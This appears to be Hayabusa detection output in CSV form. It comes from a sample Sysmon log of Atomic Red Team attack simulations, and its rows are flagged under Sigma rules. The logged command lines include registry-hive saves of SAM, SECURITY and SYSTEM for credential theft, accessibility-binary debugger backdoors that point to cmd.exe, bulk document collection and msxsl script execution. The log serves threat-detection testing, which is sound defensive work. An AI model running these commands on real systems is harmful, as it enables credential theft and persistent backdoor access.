2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\Security security.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\System system.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SAM sam.hive : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /S /D /c"" dir c: /b /s .docx "" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr /e .docx : Path: C:\Windows\System32\findstr.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:02.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.279 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.299 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.322 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:07.357 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.266 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.282 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\utilman.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.295 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:10.324 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\magnify.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.153 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
